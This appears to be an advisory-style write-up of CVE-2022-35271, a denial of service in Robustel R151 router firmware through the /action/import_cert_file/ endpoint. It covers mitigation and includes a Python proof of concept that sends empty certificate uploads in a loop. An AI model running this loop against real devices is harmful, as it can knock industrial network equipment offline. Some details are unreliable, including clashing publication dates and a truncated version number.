CVE-2022-35271 - Denial of Service in Robustel R151 Routers via `/action/import_cert_file/` API

Published: June 2024  
Severity: High  
CVSS Base Score: 7.5 (Denial of Service)  
---

Overview

Robustel's R151 router is a popular industrial-grade cellular device, often used for secure remote connectivity. In firmware versions 3.1.16 and 3.3., a denial of service (DoS) vulnerability (CVE-2022-35271) was discovered in the web management server, specifically in a function related to hash handling called hashFirst. This flaw can allow a remote attacker to lock up the router simply by sending specially-crafted requests to the /action/import_cert_file/ API endpoint.

Understanding the Vulnerability

The issue sits inside the certificate import API, used for uploading trusted root or client certificates to the router:

POST /action/import_cert_file/

A flaw in the hashFirst function leads to improper handling of requests, causing the router's service to crash or become unresponsive—a classic DoS scenario. Attackers do not need to authenticate to exploit this, making it especially dangerous if the device web interface is exposed to any network.

How Does It Work? (Exploit Details)

When a user uploads a certificate via the API, the backend processes some related hash logic (hashFirst). But when the request is malformed—such as missing certain data fields, sending abnormally large payloads, or with specifically crafted boundary/cert values—the web server enters an undefined state, consuming all resources and eventually crashing.

Here’s a simple Python snippet that demonstrates how an attacker could trigger the vulnerability

import requests

TARGET_URL = "http://ROUTER_IP/action/import_cert_file/";

# Malformed payload or empty certificate data
files = {
    'cert_file': ('malicious.crt', b''),
}

response = requests.post(TARGET_URL, files=files)
print(response.status_code)

You can automate this in a loop for persistent DoS

import time

while True:
    response = requests.post(TARGET_URL, files=files)
    print(response.status_code)
    time.sleep(.5)  # With no rate limit, even faster works

After a short time, the web management portal stops responding to new requests, requiring a manual reboot. In some cases, the whole router may hang, knocking out network traffic.

Easy to Trigger: No authentication needed unless the admin interface is properly firewalled.

- Critical Impact: Disables remote management; may even disrupt routing capabilities if resources are exhausted.

Mitigation and Patches

Robustel has released updates to their R151 firmware that address this vulnerability. If you use R151 routers, upgrade immediately to the latest firmware reportedly unaffected by this issue.

- Robustel Support Page
- Official firmware download page

Do NOT expose router admin interfaces to the public internet.

- Use network firewall rules to restrict who can access /action/import_cert_file/.

References & Further Reading

- CVE-2022-35271 NIST Entry
- Robustel R151 Product Page
- Firmware Update Guidance (Robustel KB)

Conclusion

CVE-2022-35271 is a real-world example of how a small coding oversight—in this case, in request processing logic—can let an attacker knock a critical network device offline from anywhere. As always, patch early and restrict remote management interfaces to trusted networks.

If you’re using Robustel R151 routers, check your firmware version now! Make sure your network stays stable and secure.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 02/23/2023 23:49:00 UTC